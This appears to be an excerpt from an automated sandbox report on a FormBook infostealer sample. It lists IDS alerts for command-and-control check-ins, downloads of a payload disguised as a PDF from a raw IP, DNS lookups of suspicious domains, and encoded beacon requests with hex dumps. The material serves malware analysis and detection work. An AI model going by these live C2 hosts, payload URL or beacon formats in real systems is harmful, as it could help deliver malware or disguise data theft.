                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56966 -> 111.119.219.195:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56941 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56973 -> 157.112.187.77:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56952 -> 134.122.135.54:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56976 -> 157.112.187.77:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56960 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56968 -> 172.67.148.163:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56948 -> 209.74.77.230:80
                      Downloads files with wrong headers with respect to MIME Content-Type
                      Source: httpBad PDF prefix: HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:09:49 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 10 Mar 2025 23:02:55 GMT ETag: "13b810-63004f8f5c1bc" Accept-Ranges: bytes Content-Length: 1292304 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: 67 79 d5 1a 60 9f ae 65 81 cb c2 1a df 93 f8 b7 ba 41 2d b3 3f 77 b5 9e 1f 65 07 9e 91 d5 7c 55 35 53 d1 58 66 9f 85 7e 4f f9 1e e8 b5 d9 30 ae b8 0f 4b b8 e2 02 fc cf 0a e2 e5 ef c9 eb 23 cd a5 eb 0f 1a 21 b2 22 ed f5 28 ab aa 85 29 88 e9 15 d4 8c a6 59 f0 dc b8 1f 13 d9 86 c0 6d e6 6f ee 29 8f 3d 78 21 ef 66 de d3 e8 53 a2 16 20 33 89 67 72 7e 2e 36 8e 83 4c 91 e6 cd 73 54 02 0c 7d 06 06 2b 61 28 48 b3 81 06 4a bb 5e 1c 48 cc 7d 41 7a 8c 2f 9d b7 49 c3 9b 84 0f 8f 1f a9 bf 58 14 8d ef 18 65 43 5a 4d b4 9f 04 39 e1 f7 7a 6c 74 5e ee a8 f1 7c 88 0f b1 27 13 c2 7d c4 e0 77 0f 57 23 ff 75 5f 93 cb ab 12 e7 a4 ba cd 57 76 85 5e d8 db 0f b3 ce 0d c4 02 c0 bd 6b 45 1e 09 7c b4 1f b9 e0 f4 73 c7 5c ee 8f 2c 9d 8a f2 bd f9 b5 0b 8b 72 ee 0e 95 db 14 d3 c9 ee 39 be 15 aa f8 a6 6b 62 a6 1f 26 21 be af 91 fb 67 89 e0 6d cd 6e 97 85 e8 af 51 47 12 98 2c ea 40 83 b4 f9 6e 31 33 a4 df e7 0e 9f a4 7c 05 76 15 c8 cb e1 c0 95 4d 7d 25 62 94 58 7e c6 65 2a 88 1f e1 b5 33 1b 84 5c 5e ea 60 e3 76 bb 51 7a f1 e9 73 e4 78 5e 0d 67 d5 f1 ff 6e b5 06 5e b5 0a 7c f5 9a bf 6a d2 7f 3b ea ad 0a 2e fb ef 99 21 56 c5 7d dc 12 3f cc 1b 88 a4 08 42 0e fe 15 20 0e 08 af 02 fe e8 3a 03 fc 7d fe d9 a3 26 5a 7c cd 8c e9 2e ff 5c 38 21 e1 33 e1 28 b2 b9 5d 70 01 b0 d7 b6 3d f5 01 64 3c e1 86 2f b9 70 1b e9 0f 06 43 ef 24 97 40 48 43 5a 55 0a 54 35 17 60 f4 06 75 e1 87 5c de f4 e2 96 4c 25 68 73 bd 34 45 85 55 57 39 c0 8d 50 0a 16 74 e7 97 b7 28 11 0f 25 a7 2d 11 7e 11 75 90 c5 a4 12 30 50 bd ed 7d ee 8c 2d fa 76 a1 7b 92 a7 ed b2 c7 3d 52 06 f8 c8 4f a5 a4 3a 33 8f 2c f2 84 f2 b4 bc 5a 08 1e e0 96 65 7b 3d 20 77 f6 b5 ff ff ce ba 73 85 56 b7 58 1d 1d 5d 5c e2 99 3d bb a4 81 89 2c 48 12 8d 60 5d 34 f8 85 1c 3d 20 98 c7 88 e4 50 57 77 ac 6e b5 07 00 ab 06 bb 6e 38 82 5c 87 63 98 2d e7 93 1d ac 7c 51 f2 85 9f 3f da 25 a5 4d 60 39 4c 7a 8f 4f 84 11 65 80 98 ee 75 c8 43 8c 85 a1 28 cc da 64 a6 47 8a ac c4 ae 11 fe 84 5b 75 3f b4 92 75 07 7c 98 e2 3a c6 d7 57 9e 6f 2a 3a 9a 74 96 97 1d df 55 ee fa 54 7e 13 1c 6a a8 41 60 62 a7 d2 67 20 47 5a e5 12 e4 b9 f8 36 1a 1c a5 f2 a0 94 97 53 ea 5b f9 9f 04 fd 1b 40 94 07 36 27 e6 02 68 3e bb 43 cd b4 40 63 a6 3f 59 3e a0 ba a6 fc 0f 66 ca 8b a2 22 a7 f8 9c 6f 53 9b 9d fa 11 98 e7 26 0b 6c b6 60 d7 b0 b1 0c 6c 7f ad 2f b3 28 a8 ff 26 ed 0a 39 b8 fb 2f a9 eb 48 41 da f8 0f c4 a2 f8 3a d5 43 d3 cb be 20 2b 9d 4d bb e5 b5 82 5c 9b 5b a2 c5 34 b1 15 27 29 ca d0 8a d4 77 86 15 d4 fe 96 ff 01 68 ee 1c 08 61 55 3e f6 28 7b 3a b0 30 fc 35 66 a9 c9 64 9b fe b4 69 9a e3 09 37 8e 5c de fe c3 97 74 20 3a db c2 fa d8 6d fe 32 85 6d d3 b8 6a 6e 51 4f 11 7e 58 9c a4 77 fa 90 0e e6 31 28 6f 50 e7 e4 d5 87 41 50 d5 41 8b 64 35 56 2d 51 8f 74 03 50 7
                      Source: httpBad PDF prefix: HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:10:13 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 10 Mar 2025 23:02:55 GMT ETag: "13b810-63004f8f5c1bc" Accept-Ranges: bytes Content-Length: 1292304 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: 67 79 d5 1a 60 9f ae 65 81 cb c2 1a df 93 f8 b7 ba 41 2d b3 3f 77 b5 9e 1f 65 07 9e 91 d5 7c 55 35 53 d1 58 66 9f 85 7e 4f f9 1e e8 b5 d9 30 ae b8 0f 4b b8 e2 02 fc cf 0a e2 e5 ef c9 eb 23 cd a5 eb 0f 1a 21 b2 22 ed f5 28 ab aa 85 29 88 e9 15 d4 8c a6 59 f0 dc b8 1f 13 d9 86 c0 6d e6 6f ee 29 8f 3d 78 21 ef 66 de d3 e8 53 a2 16 20 33 89 67 72 7e 2e 36 8e 83 4c 91 e6 cd 73 54 02 0c 7d 06 06 2b 61 28 48 b3 81 06 4a bb 5e 1c 48 cc 7d 41 7a 8c 2f 9d b7 49 c3 9b 84 0f 8f 1f a9 bf 58 14 8d ef 18 65 43 5a 4d b4 9f 04 39 e1 f7 7a 6c 74 5e ee a8 f1 7c 88 0f b1 27 13 c2 7d c4 e0 77 0f 57 23 ff 75 5f 93 cb ab 12 e7 a4 ba cd 57 76 85 5e d8 db 0f b3 ce 0d c4 02 c0 bd 6b 45 1e 09 7c b4 1f b9 e0 f4 73 c7 5c ee 8f 2c 9d 8a f2 bd f9 b5 0b 8b 72 ee 0e 95 db 14 d3 c9 ee 39 be 15 aa f8 a6 6b 62 a6 1f 26 21 be af 91 fb 67 89 e0 6d cd 6e 97 85 e8 af 51 47 12 98 2c ea 40 83 b4 f9 6e 31 33 a4 df e7 0e 9f a4 7c 05 76 15 c8 cb e1 c0 95 4d 7d 25 62 94 58 7e c6 65 2a 88 1f e1 b5 33 1b 84 5c 5e ea 60 e3 76 bb 51 7a f1 e9 73 e4 78 5e 0d 67 d5 f1 ff 6e b5 06 5e b5 0a 7c f5 9a bf 6a d2 7f 3b ea ad 0a 2e fb ef 99 21 56 c5 7d dc 12 3f cc 1b 88 a4 08 42 0e fe 15 20 0e 08 af 02 fe e8 3a 03 fc 7d fe d9 a3 26 5a 7c cd 8c e9 2e ff 5c 38 21 e1 33 e1 28 b2 b9 5d 70 01 b0 d7 b6 3d f5 01 64 3c e1 86 2f b9 70 1b e9 0f 06 43 ef 24 97 40 48 43 5a 55 0a 54 35 17 60 f4 06 75 e1 87 5c de f4 e2 96 4c 25 68 73 bd 34 45 85 55 57 39 c0 8d 50 0a 16 74 e7 97 b7 28 11 0f 25 a7 2d 11 7e 11 75 90 c5 a4 12 30 50 bd ed 7d ee 8c 2d fa 76 a1 7b 92 a7 ed b2 c7 3d 52 06 f8 c8 4f a5 a4 3a 33 8f 2c f2 84 f2 b4 bc 5a 08 1e e0 96 65 7b 3d 20 77 f6 b5 ff ff ce ba 73 85 56 b7 58 1d 1d 5d 5c e2 99 3d bb a4 81 89 2c 48 12 8d 60 5d 34 f8 85 1c 3d 20 98 c7 88 e4 50 57 77 ac 6e b5 07 00 ab 06 bb 6e 38 82 5c 87 63 98 2d e7 93 1d ac 7c 51 f2 85 9f 3f da 25 a5 4d 60 39 4c 7a 8f 4f 84 11 65 80 98 ee 75 c8 43 8c 85 a1 28 cc da 64 a6 47 8a ac c4 ae 11 fe 84 5b 75 3f b4 92 75 07 7c 98 e2 3a c6 d7 57 9e 6f 2a 3a 9a 74 96 97 1d df 55 ee fa 54 7e 13 1c 6a a8 41 60 62 a7 d2 67 20 47 5a e5 12 e4 b9 f8 36 1a 1c a5 f2 a0 94 97 53 ea 5b f9 9f 04 fd 1b 40 94 07 36 27 e6 02 68 3e bb 43 cd b4 40 63 a6 3f 59 3e a0 ba a6 fc 0f 66 ca 8b a2 22 a7 f8 9c 6f 53 9b 9d fa 11 98 e7 26 0b 6c b6 60 d7 b0 b1 0c 6c 7f ad 2f b3 28 a8 ff 26 ed 0a 39 b8 fb 2f a9 eb 48 41 da f8 0f c4 a2 f8 3a d5 43 d3 cb be 20 2b 9d 4d bb e5 b5 82 5c 9b 5b a2 c5 34 b1 15 27 29 ca d0 8a d4 77 86 15 d4 fe 96 ff 01 68 ee 1c 08 61 55 3e f6 28 7b 3a b0 30 fc 35 66 a9 c9 64 9b fe b4 69 9a e3 09 37 8e 5c de fe c3 97 74 20 3a db c2 fa d8 6d fe 32 85 6d d3 b8 6a 6e 51 4f 11 7e 58 9c a4 77 fa 90 0e e6 31 28 6f 50 e7 e4 d5 87 41 50 d5 41 8b 64 35 56 2d 51 8f 74 03 50 7
                      Performs DNS queries to domains with low reputation
                      Source: DNS query: www.lenzor.xyz
                      Source: DNS query: www.031233720.xyz
                      Source: DNS query: www.dualbitcoin.xyz
                      Source: DNS query: www.ethereumkeeper.xyz
                      Source: DNS query: www.moonavatar.xyz
                      Source: DNS query: www.blogkart4u.xyz
                      Source: DNS query: www.splogi.xyz
                      Source: global trafficTCP traffic: 192.168.2.8:56923 -> 162.159.36.2:53
                      Source: global trafficHTTP traffic detected: GET /win32/panel/uploads/Gdugwwjztt.pdf HTTP/1.1Host: 196.251.83.222Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /win32/panel/uploads/Gdugwwjztt.pdf HTTP/1.1Host: 196.251.83.222Connection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 8.222.228.107 8.222.228.107
                      Source: Joe Sandbox ViewIP Address: 157.112.187.77 157.112.187.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: global trafficHTTP traffic detected: GET /win32/panel/uploads/Gdugwwjztt.pdf HTTP/1.1Host: 196.251.83.222Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /win32/panel/uploads/Gdugwwjztt.pdf HTTP/1.1Host: 196.251.83.222Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /0pv3/?lX=uP8X&vVgx8nB0=I6G8DBRKF3PN9Cy5HjggG2ycZCNyM0JG3kSPGuvbR5esC8dJu2EfwhpJJLd7FYxSNzCiq9OPGq3cAsVzLwaIAq+rDUC7Ws6F1E/QRL3HoNlolI9QSKQE0mSGSrcLWdFvRw== HTTP/1.1Host: www.crosspatches.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /ynw5/?vVgx8nB0=ZF/ThatktxT4IEpwfKsUOyQVHh5nHqomFNyY5ir4FklXSfOpwm6EfqJ4jyoelDA7A+pvc8dOI9DtdfL88IP+1kOCv+QPJBPSYWlpE+7rJT4XimcIjMNVjm2BzIrdTYhFEQ==&lX=uP8X HTTP/1.1Host: www.quo1ybjmkhdqljoz.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /pknc/?vVgx8nB0=TsWT+PVJyweInpctzthQVdxTMr7Q3Mb2cuEH07dFoI07yBLnimF2DBYyoUH276N8oHesXX9azD5G5u0ynw8eGFj9tum9xXwIQ0i8jcSREbVxD3yrlD8BVP9rS1PvZDB20g==&lX=uP8X HTTP/1.1Host: www.lenzor.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /hxn2/?vVgx8nB0=ZV/imptMlgE5kVt692kkoOOnpYQNqGQCFmm/TGgbqnHG1mgu4lPPJ2KHb3Eys5m88oXnT1AcDhAihVQlrO8FUlJM8pp5ZWnyQzjiEF0o+8f3DTsNGzDCqAFXqps7Otorhw==&lX=uP8X HTTP/1.1Host: www.warc.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /qxo2/?vVgx8nB0=o8DmqPI+VqVvnj/lu1ZpZtXdZr7bSrN2dVm8WOSQKn+kpW+rBJORjMlPia6OnGwbOFqdqYTBcx/hOJb3c+NaqPX0LJkVfisaYNtVIumZsa/w93UM+1/1xwWXjFPUQFIIoA==&lX=uP8X HTTP/1.1Host: www.dualbitcoin.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /shtf/?lX=uP8X&vVgx8nB0=FhU37QPUjXoDR/mkORBYEbzjzv1Jdaom3Ft3Wddglnt/yj+EbctenxscC0kIxMOxkZk08U8HpLn+XILh76EKfBcWBx3ZdyGeG6imEjJY2D+6g27gdHVaycndfCLvnlFPmA== HTTP/1.1Host: www.lifce.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /qkhv/?vVgx8nB0=i51Ixu4M5LOvjs5atst6QhQmAxFvlGpFEg8Yva/DYuN1L4sxQPD0gcYXROip4eIGKLRWO2x5MCzKIlk6eYaz3FYy7ZtcWTJr5uThofgj61z5iUNO0ndKyizlBAbSXj3dvw==&lX=uP8X HTTP/1.1Host: www.2y0uoqwoohvdf5vd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /gu37/?lX=uP8X&vVgx8nB0=iOl0XSH5CDMOf+V9HZ+UKaCE6FMs6uPW7cxb7UU6mqRal+VgoP4cf7GVxAN/lcjotRpWXcIGUQ8s/QpRPpBC0s0rNGXrLX7QDONBrJAsmoe5Xjn3FbB7jvONWBxWv0+Npg== HTTP/1.1Host: www.ethereumkeeper.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /36cg/?vVgx8nB0=c6lcAlso4cwdWdj8OmW47AtI274xiSR94bq7w+xrmdROEAiOB56qTuKvZNoCgSLBfC/6u7yUdjQUAHkJ36WqigWvF+W/duDuE7nAcq/mnuhXg7Y1Cc7r91JMMuzgajzb2w==&lX=uP8X HTTP/1.1Host: www.blogkart4u.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /4w1v/?vVgx8nB0=XpAG9fe2pLhJKmhZ85et2/QP5MtwFiP0J2u6NTgZVwSRoaiRiOX3KjlWgf7AqOqvMoNp5Q5VLCDsww+9yNor5ytr2WIHcAqjmNJrHjaZFAGyn8W5/AYut6n/+WvKvTb4gg==&lX=uP8X HTTP/1.1Host: www.xiongding.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /hlq7/?lX=uP8X&vVgx8nB0=dKN4O6z/N4DapGrcMOyrOAnbRVSrFobPG5RCVPQvSrMdLQWk1/Pc73VtQKyrUXqHVsljfksdfGpNujtuX/ZsoQbQw1ZjcAXf/RBxpP3vDPBqvfaPTUP+zIuVIrlIxG7UVQ== HTTP/1.1Host: www.savposalore.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /ti21/?vVgx8nB0=WGxoXqct8zJEPhtv7hvcADdTxPrqYVBaAgo9WLM116GuHzjz/IohiFqyzVfMSqM9DJaG8JlLLxRiginV+Pkm5SzO6x71SPK57QSrEA4wlUVlvQvqLEJhjjQQTB+w8Fkx0A==&lX=uP8X HTTP/1.1Host: www.splogi.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /pzq1/?vVgx8nB0=oDRqyMa6fuBuz7WmYIBwRJUpV6l9q4FTd5aLt2B5ybsFCSl98v1LZFy0dWfSbHe14Kep4ozyTwqi5TiZwq01U//3mNoy1jqeIyDC7DcZZUyW/Gu+bds5KjNjbZauKnuP5A==&lX=uP8X HTTP/1.1Host: www.knowesis.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
                      Source: global trafficDNS traffic detected: DNS query: www.crosspatches.info
                      Source: global trafficDNS traffic detected: DNS query: www.quo1ybjmkhdqljoz.top
                      Source: global trafficDNS traffic detected: DNS query: www.lenzor.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.warc.tech
                      Source: global trafficDNS traffic detected: DNS query: www.031233720.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.dualbitcoin.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.lifce.life
                      Source: global trafficDNS traffic detected: DNS query: www.2y0uoqwoohvdf5vd.top
                      Source: global trafficDNS traffic detected: DNS query: www.ethereumkeeper.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.moonavatar.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.blogkart4u.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.xiongding.tech
                      Source: global trafficDNS traffic detected: DNS query: www.savposalore.shop
                      Source: global trafficDNS traffic detected: DNS query: www.splogi.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.knowesis.app
                      Source: unknownHTTP traffic detected: POST /ynw5/ HTTP/1.1Host: www.quo1ybjmkhdqljoz.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.quo1ybjmkhdqljoz.topReferer: http://www.quo1ybjmkhdqljoz.top/ynw5/Connection: closeCache-Control: no-cacheContent-Length: 209Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1Data Raw: 76 56 67 78 38 6e 42 30 3d 55 48 58 7a 69 74 35 69 68 6d 6e 75 56 45 64 6d 57 71 6f 47 48 51 30 58 4d 6a 70 55 53 66 4d 72 48 50 71 38 77 43 7a 4e 49 56 78 43 52 74 66 75 36 55 33 36 51 76 59 65 6e 54 74 67 73 68 6f 4e 49 63 70 64 59 38 5a 56 51 4e 79 52 66 76 4c 2b 33 38 65 2f 6a 30 6d 39 70 74 46 78 59 52 62 57 66 6d 6f 36 44 50 61 4a 4c 48 6b 61 6b 46 77 49 6f 2f 78 50 75 57 47 7a 34 6f 33 6b 48 73 6f 64 65 6f 67 65 64 66 56 35 48 69 63 45 62 63 42 79 32 61 79 74 33 53 50 4a 36 49 7a 6d 57 58 4b 65 47 38 45 41 2b 6d 63 37 4a 59 36 38 4d 6e 64 71 63 4f 31 6f 30 74 33 57 34 36 36 53 34 56 5a 46 57 45 56 41 54 44 67 3d Data Ascii: vVgx8nB0=UHXzit5ihmnuVEdmWqoGHQ0XMjpUSfMrHPq8wCzNIVxCRtfu6U36QvYenTtgshoNIcpdY8ZVQNyRfvL+38e/j0m9ptFxYRbWfmo6DPaJLHkakFwIo/xPuWGz4o3kHsodeogedfV5HicEbcBy2ayt3SPJ6IzmWXKeG8EA+mc7JY68MndqcO1o0t3W466S4VZFWEVATDg=
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 08:12:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
